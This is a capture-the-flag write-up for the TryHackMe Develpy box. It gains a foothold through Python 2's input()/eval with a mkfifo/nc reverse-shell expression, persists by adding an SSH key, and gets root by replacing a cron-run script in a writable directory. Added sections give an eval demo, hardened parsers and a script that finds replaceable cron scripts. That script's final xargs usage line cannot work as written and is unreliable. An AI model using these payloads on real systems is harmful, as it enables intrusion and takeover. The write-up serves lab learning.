# Develpy-TryHackMe
> This is a writeup for the THM box Develpy
> https://tryhackme.com/room/bsidesgtdevelpy
>
> 
>
> `Difficulty: Medium`
>
> `Task 1 `
>
> > read user.txt and root.txt
>
> ---
>
## Solution
### Nmap
> Running an `nmap` scan we find two open services: SSH and an unknown service on port 10000.
> 
>
---
### Port 10000
> Running a deeper scan (version and script detection) on port 10000:
> ```bash
> $ nmap -A -p 10000 10.10.38.226 -T4
> ```
> 
>
>
> The scan output shows a Python script, `exploit.py`, serving port `10000`.
>
> Trying different inputs, I found that it evaluated `1*2`:
> 
>
>
> This means the script is running under Python 2: there, `input()` is equivalent to `eval(raw_input())`, so whatever expression we send is evaluated as Python code,
> as explained in [this](https://intx0x80.blogspot.com/2017/05/python-input-vulnerability_25.html) article.
>
> Since the input is passed to `eval`, we send a Python expression that spawns a [reverse shell](https://www.revshells.com/) back to our listener:
> ```bash
> # kali: start the listener first
> nc -lvnp 5051
>
> # expression sent as the input to the script on port 10000
> # (10.17.52.250 is our own VPN address)
> __import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.52.250 5051 >/tmp/f')
> ```
>
> Since reverse shells are not stable, we `ssh` to the box instead by saving our public key in `~/.ssh/authorized_keys`.
>
> We create an RSA key pair with `ssh-keygen`:
> 
>
>
> We copy the contents of `id_rsa.pub` and install it on the box:
>
> ```bash
> # on the box, inside the reverse shell
> mkdir -p ~/.ssh && chmod 700 ~/.ssh        # sshd rejects keys if .ssh is group/world writable
> echo '<contents of id_rsa.pub>' >> ~/.ssh/authorized_keys
> chmod 600 ~/.ssh/authorized_keys
> ```
>
> We can now SSH to the box with the private key:
>
> 
>
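The Python 2 `input()` behaviour exploited above, as an added example that is not part of the original writeup. `py2_input` emulates Python 2's `input()` (which is `eval(raw_input())`) on Python 3 so the bug can be shown without a Python 2 interpreter, and `safe_int` and `literal_only` are two hardened ways of reading the same "number" the script asks for. `PAYLOAD` is a constructed, harmless stand-in for the reverse-shell expression: it only reports the interpreter's working directory.

```python
"""Added example (not from the original writeup): why Python 2's input()
gives code execution, and how to read a number without evaluating input."""
import ast
import os


def py2_input(line: str):
    """Emulate Python 2 input(): the line is evaluated as a Python expression.
    This is the vulnerable pattern, kept deliberately insecure."""
    return eval(line)


def safe_int(line: str, lo: int = 1, hi: int = 1000) -> int:
    """Hardened replacement: parse a bounded integer, never evaluate."""
    text = line.strip()
    if not text.lstrip("-").isdigit():
        raise ValueError(f"not an integer: {text!r}")
    value = int(text)
    if not lo <= value <= hi:
        raise ValueError(f"out of range: {value}")
    return value


def literal_only(line: str):
    """ast.literal_eval accepts literals only; names, calls and
    attribute access raise ValueError."""
    return ast.literal_eval(line)


# Constructed stand-in for the reverse-shell payload: runs code, but harmless.
PAYLOAD = "__import__('os').getcwd()"


def demo() -> dict:
    """Run each reader against arithmetic and against the payload."""
    results = {}
    results["py2_arith"] = py2_input("1*2")                    # 2: expression evaluated
    results["py2_payload"] = py2_input(PAYLOAD) == os.getcwd()  # True: our code ran
    try:
        safe_int(PAYLOAD)
        results["safe_payload"] = "accepted"
    except ValueError:
        results["safe_payload"] = "rejected"
    results["safe_number"] = safe_int(" 5 ")
    try:
        literal_only(PAYLOAD)
        results["literal_payload"] = "accepted"
    except ValueError:
        results["literal_payload"] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The takeaway is that any Python 2 service reading untrusted data with `input()` is remote code execution by design; the fix is `raw_input()` plus explicit parsing (or Python 3, where `input()` returns a string).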
>
---
### Privilege escalation
> Exploring the system, I found that cron jobs were running:
> 
>
>
> Checking the permissions of `root.sh`, the file itself was only readable by us, but the directory containing it was owned by `king`:
>
> 
>
>
> A write-protected file can still be [deleted](https://stackoverflow.com/questions/14496128/why-can-i-delete-write-protect-filehard-link-in-my-own-directory) by whoever has write permission on its directory, because unlinking modifies the directory entry, not the file.
> So I deleted the file and wrote a reverse shell into a new `root.sh`, which the cron job would run in its place:
>
> 
>
>
> After `1 min` the cron job fired and I got the connection:
>
> 
>
>
> Hence the box is rooted `^_^`
>
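The privilege-escalation check from the section above, as an added example that is not the writeup's own code: `cron_script_paths` pulls the script paths out of `/etc/crontab`-style text, `find_replaceable` flags the ones that are read-only for us but sit in a directory we can write to, and `replace_script` swaps such a file by unlinking and recreating it. The crontab text is a constructed sample, and `/home/king/root.sh` in it is an assumed path, not one taken from the box; `demo` reproduces the swap in a throwaway directory.

```sh
#!/bin/sh
# Added example, not from the original writeup: find cron-run scripts we
# can replace despite the file being read-only, because unlink()/rename()
# only need write permission on the parent directory, not on the file.

# Constructed sample in /etc/crontab format: min hour dom mon dow user command
SAMPLE_CRONTAB='SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
*  * * * * root /home/king/root.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly'

# Read crontab text on stdin and print the first token of each command.
# Comment lines and VAR=value lines (fewer than 7 fields) are skipped.
cron_script_paths() {
    awk '!/^[[:space:]]*#/ && NF >= 7 { print $7 }'
}

# For each path, print it if the file exists, is not writable by us, but
# its parent directory is. Exit status 0 if at least one was found.
find_replaceable() {
    found=1
    for p in "$@"; do
        if [ -e "$p" ] && [ ! -w "$p" ] && [ -w "$(dirname "$p")" ]; then
            echo "$p"
            found=0
        fi
    done
    return "$found"
}

# Replace a read-only script: rm -f unlinks it (directory permission),
# then a new file with the same name is created with our contents.
replace_script() {
    path=$1
    new_body=$2
    rm -f "$path"
    printf '%s\n' "$new_body" > "$path"
    chmod 755 "$path"
}

# Self-contained demo: a 0444 "root.sh" in a temp dir we own gets swapped
# for our own script; returns the output of the replacement.
demo() {
    work=$(mktemp -d)
    script="$work/root.sh"
    printf '#!/bin/sh\necho original\n' > "$script"
    chmod 444 "$script"
    replace_script "$script" '#!/bin/sh
echo replaced'
    out=$(sh "$script")
    rm -rf "$work"
    echo "$out"
}

# Usage on a target: printf '%s\n' "$SAMPLE_CRONTAB" | cron_script_paths | xargs find_replaceable
# (or pipe the real /etc/crontab instead of the sample)
```

On the real box the second pipeline above is what to run: any path it prints is a script a root cron job will execute that we can rewrite with our own contents, exactly the situation with `root.sh` here.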
----